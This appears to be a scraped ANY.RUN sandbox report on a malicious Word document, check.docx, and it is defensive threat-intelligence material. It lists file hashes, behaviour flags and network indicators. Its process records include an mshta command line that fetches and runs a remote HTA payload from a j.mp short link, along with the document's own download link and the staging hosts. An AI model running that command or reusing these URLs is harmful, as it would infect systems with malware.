analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

check.docx

Full analysis: https://app.any.run/tasks/5dc3c9a2-536e-42eb-83ec-83dce4b532ac
Verdict: Malicious activity
Analysis date: October 09, 2019, 14:31:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

E1A140C17F21569B80E3B836AA6DE961

SHA1:

D1BE9467536D6CF8CF9BEABEDEAF8C97E0FC50F9

SHA256:

25ABB81E40FC852703936AE6D34C95A0C8265394BA738063FCC2521698A80A9E

SSDEEP:

1536:XrellrelGrzB/QhoCDW+4oDCdYH6oi4jRafCHx:Xrezre8/aDCdFoBjRaaR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2436)
      • EXCEL.EXE (PID: 3188)
      • EXCEL.EXE (PID: 3948)
      • EXCEL.EXE (PID: 556)
      • EXCEL.EXE (PID: 2680)
      • EXCEL.EXE (PID: 3204)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 3972)
      • mshta.exe (PID: 2644)
      • mshta.exe (PID: 2360)
      • mshta.exe (PID: 3096)
      • mshta.exe (PID: 3780)
      • mshta.exe (PID: 3492)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2436)
      • EXCEL.EXE (PID: 3188)
      • EXCEL.EXE (PID: 3948)
      • EXCEL.EXE (PID: 556)
      • EXCEL.EXE (PID: 2680)
      • EXCEL.EXE (PID: 3204)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2436)
      • EXCEL.EXE (PID: 3188)
      • EXCEL.EXE (PID: 3948)
      • EXCEL.EXE (PID: 556)
      • EXCEL.EXE (PID: 2680)
      • EXCEL.EXE (PID: 3204)
      • excelcnv.exe (PID: 3036)
      • excelcnv.exe (PID: 2128)
      • excelcnv.exe (PID: 3020)
      • excelcnv.exe (PID: 2632)
      • excelcnv.exe (PID: 3300)
      • excelcnv.exe (PID: 2712)
    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 916)
    • Creates files in the user directory

      • mshta.exe (PID: 2644)
      • mshta.exe (PID: 3096)
      • mshta.exe (PID: 2360)
      • mshta.exe (PID: 3780)
      • mshta.exe (PID: 3972)
      • mshta.exe (PID: 3492)
    • Reads Internet Cache Settings

      • mshta.exe (PID: 3780)
      • mshta.exe (PID: 3972)
      • mshta.exe (PID: 3096)
      • mshta.exe (PID: 2644)
      • mshta.exe (PID: 2360)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 916)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2436)
      • WINWORD.EXE (PID: 916)
      • EXCEL.EXE (PID: 3188)
      • EXCEL.EXE (PID: 3948)
      • EXCEL.EXE (PID: 556)
      • EXCEL.EXE (PID: 2680)
      • excelcnv.exe (PID: 3036)
      • excelcnv.exe (PID: 2128)
      • EXCEL.EXE (PID: 3204)
      • excelcnv.exe (PID: 2712)
      • excelcnv.exe (PID: 3020)
      • excelcnv.exe (PID: 2632)
      • excelcnv.exe (PID: 3300)
    • Reads internet explorer settings

      • mshta.exe (PID: 3972)
      • mshta.exe (PID: 2644)
      • mshta.exe (PID: 2360)
      • mshta.exe (PID: 3096)
      • mshta.exe (PID: 3492)
      • mshta.exe (PID: 3780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 60
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 52
Words: 9
Pages: 1
TotalEditTime: 1 minute
Template: Normal.dotm
ModifyDate: 2019:09:28 23:43:00Z
CreateDate: 2019:09:28 23:42:00Z
RevisionNumber: 2
LastModifiedBy: DA JADE
Keywords: -

XMP

Description: -
Creator: DA JADE
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1416
ZipCompressedSize: 368
ZipCRC: 0xc59e8d53
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
19
Malicious processes
12
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
916"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\check.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2436"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3972mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3188"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2644mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3948"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2360mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
556"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3096mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2680"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Total events
4 708
Read events
3 952
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
25
Text files
118
Unknown types
20

Dropped files

PID
Process
Filename
Type
916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR651E.tmp.cvr
MD5:
SHA256:
916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA998FCE.wmf
MD5:
SHA256:
916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{02B31E9F-6A2D-403E-BF5E-96A799CEBBCF}
MD5:
SHA256:
916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\760E819D.doc
MD5:
SHA256:
2436EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC60A.tmp.cvr
MD5:
SHA256:
2436EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFD63BF818D6DB938C.TMP
MD5:
SHA256:
3188EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE1CF.tmp.cvr
MD5:
SHA256:
916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\422639AF.wmf
MD5:
SHA256:
916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:52F3C1187E610BE40CDE9E03C86F0CAC
SHA256:FBFA9112D49631A93C972E173BC3C7F3FAD15C1A3B72A6E76158420A8DA530CF
916WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:E86FF4998F84B7A674CADC896DB84F35
SHA256:48F75149D5CB61DC1300E2AF4624EDE18939BB7280E2D2135BC52B844A268A20
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
90
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
916
WINWORD.EXE
GET
301
67.199.248.17:80
http://j.mp/updatedic13
US
html
163 b
shared
916
WINWORD.EXE
OPTIONS
405
67.199.248.17:80
http://j.mp/
US
html
109 b
shared
916
WINWORD.EXE
OPTIONS
405
67.199.248.17:80
http://j.mp/
US
html
109 b
shared
916
WINWORD.EXE
OPTIONS
405
67.199.248.17:80
http://j.mp/
US
html
109 b
shared
916
WINWORD.EXE
HEAD
301
67.199.248.17:80
http://j.mp/updatedic13
US
html
163 b
shared
916
WINWORD.EXE
OPTIONS
405
67.199.248.17:80
http://j.mp/
US
html
109 b
shared
3972
mshta.exe
GET
301
67.199.248.17:80
http://j.mp/adjkby5sxfsaasdi
US
html
134 b
shared
916
WINWORD.EXE
GET
301
67.199.248.17:80
http://j.mp/updatedic13
US
html
163 b
shared
3096
mshta.exe
GET
301
67.199.248.17:80
http://j.mp/adjkby5sxfsaasdi
US
html
134 b
shared
916
WINWORD.EXE
GET
301
67.199.248.17:80
http://j.mp/updatedic13
US
html
163 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
980
svchost.exe
67.199.248.17:80
j.mp
Bitly Inc
US
shared
916
WINWORD.EXE
67.199.248.17:80
j.mp
Bitly Inc
US
shared
3972
mshta.exe
172.217.18.161:443
asdiamecwecw8cew.blogspot.com
Google Inc.
US
whitelisted
916
WINWORD.EXE
35.241.16.116:443
static.wixstatic.com
US
unknown
3972
mshta.exe
67.199.248.17:80
j.mp
Bitly Inc
US
shared
3972
mshta.exe
216.58.206.9:443
www.blogger.com
Google Inc.
US
whitelisted
3972
mshta.exe
216.58.206.13:443
accounts.google.com
Google Inc.
US
whitelisted
2644
mshta.exe
172.217.18.161:443
asdiamecwecw8cew.blogspot.com
Google Inc.
US
whitelisted
2644
mshta.exe
67.199.248.17:80
j.mp
Bitly Inc
US
shared
2644
mshta.exe
216.58.206.9:443
www.blogger.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
j.mp
  • 67.199.248.17
  • 67.199.248.16
shared
static.wixstatic.com
  • 35.241.16.116
whitelisted
asdiamecwecw8cew.blogspot.com
  • 172.217.18.161
whitelisted
www.blogger.com
  • 216.58.206.9
shared
resources.blogblog.com
  • 216.58.206.9
whitelisted
accounts.google.com
  • 216.58.206.13
shared
fonts.googleapis.com
  • 172.217.18.10
whitelisted
www.google.com
  • 216.58.207.68
whitelisted
fonts.gstatic.com
  • 172.217.22.3
whitelisted
www.google-analytics.com
  • 216.58.207.78
  • 172.217.16.174
whitelisted

Threats

PID
Process
Class
Message
916
WINWORD.EXE
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3972
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2644
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2360
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3096
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3492
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3780
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info